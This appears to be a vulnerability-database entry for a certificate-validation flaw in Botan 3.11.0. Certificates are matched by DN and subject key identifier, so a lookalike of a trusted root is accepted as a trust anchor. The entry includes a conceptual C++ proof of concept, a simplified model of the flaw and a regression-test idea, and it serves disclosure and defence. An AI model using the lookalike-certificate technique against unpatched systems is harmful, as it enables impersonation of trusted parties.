Security Vulnerability Report
CVE-2026-34580 CVSS 7.5 HIGH

CVE-2026-34580

Published: 2026-04-07 22:16:23
Last Modified: 2026-04-17 20:30:03

Description

Botan is a C++ cryptography library. In 3.11.0, the function Certificate_Store::certificate_known had a misleading name: it would return true if any certificate in the store had a DN (and subject key identifier, if set) matching that of the argument. It did not check that the certificate it found and the certificate it was passed were actually the same certificate. In 3.11.0, path validation logic was extended in a way that assumed certificate_known only returned true if the certificates were in fact identical. The impact is that if an end entity certificate is presented, and its DN (and subject key identifier, if set) match that of any trusted root, the end entity certificate is accepted immediately as if it were itself a trusted root. This vulnerability is fixed in 3.11.1.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:botan_project:botan:3.11.0:*:*:*:*:*:*:* - VULNERABLE
Botan 3.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```cpp
// Conceptual PoC for demonstrating the logic flaw in Botan 3.11.0
// This code simulates the behavior where a non-identical certificate
// is accepted because DN and SKI match.
#include <botan/certstor.h>
#include <botan/x509cert.h>
#include <iostream>

int main() {
    // Load a trusted root certificate (e.g., RootCA)
    auto trusted_root = Botan::X509_Certificate("trusted_root.pem");

    // Create a Certificate_Store containing the root
    Botan::Certificate_Store_In_Memory cert_store;
    cert_store.add_certificate(trusted_root);

    // Attacker creates a malicious End Entity (EE) certificate
    // with the SAME DN and SKI as the trusted root, but different keys.
    // In a real attack, this cert would be generated by the attacker.
    auto malicious_ee = Botan::X509_Certificate("malicious_ee_same_dn.pem");

    // Vulnerable check in Botan 3.11.0
    // The function 'certificate_known' checks DN/SKI match, not identity.
    bool is_known = cert_store.certificate_known(malicious_ee);

    if (is_known) {
        std::cout << "[!] Vulnerability Triggered: Malicious certificate accepted as trusted!" << std::endl;
        std::cout << " The library mistakenly believes the EE cert is the Root CA." << std::endl;
    } else {
        std::cout << "[+] Safe: Certificate correctly rejected." << std::endl;
    }
    return 0;
}
```
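The distinction the description turns on, name match versus certificate identity, shown as an added example in a self-contained model; it is not Botan's code or the 3.11.1 patch. The `Cert` and `TrustStore` types, the function names and the sample values are hypothetical, and the `der` string stands in for the certificate's full encoding.

```cpp
// Simplified model, not Botan's code: a DN/SKI match is not certificate identity.
#include <algorithm>
#include <iostream>
#include <string>
#include <vector>

// Hypothetical stand-in for an X.509 certificate.
struct Cert {
    std::string subject_dn;
    std::string ski;  // subject key identifier; empty means "not set"
    std::string der;  // constructed placeholder for the full DER encoding
};

class TrustStore {
public:
    void add(const Cert& c) { certs_.push_back(c); }

    // Name-based lookup as the description states it: DN (and SKI, if set) match.
    bool name_known(const Cert& c) const {
        return std::any_of(certs_.begin(), certs_.end(), [&](const Cert& t) {
            return t.subject_dn == c.subject_dn && (c.ski.empty() || t.ski == c.ski);
        });
    }

    // Identity lookup: true only if the stored encoding equals the presented one.
    bool contains_exact(const Cert& c) const {
        return std::any_of(certs_.begin(), certs_.end(),
                           [&](const Cert& t) { return t.der == c.der; });
    }

private:
    std::vector<Cert> certs_;
};

// "May this certificate be treated as a trust anchor outright?"
bool anchor_by_name(const TrustStore& s, const Cert& c) { return s.name_known(c); }  // flawed assumption
bool anchor_by_identity(const TrustStore& s, const Cert& c) { return s.contains_exact(c); }

int main() {
    TrustStore store;
    Cert root{"CN=Example Root CA", "01:02:03", "der-of-root"};            // constructed
    Cert lookalike{"CN=Example Root CA", "01:02:03", "der-of-lookalike"};  // constructed
    store.add(root);
    std::cout << "name match accepts lookalike: " << anchor_by_name(store, lookalike) << '\n'
              << "identity check accepts lookalike: " << anchor_by_identity(store, lookalike) << '\n'
              << "identity check accepts root: " << anchor_by_identity(store, root) << '\n';
    return 0;
}
```

A regression test for a patched build can assert the same three outcomes against the real library: the genuine root is recognised, while a certificate that only shares its DN and subject key identifier is not treated as an anchor.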

References

https://github.com/randombit/botan/security/advisories/GHSA-v782-6fq4-q827 (Vendor Advisory)
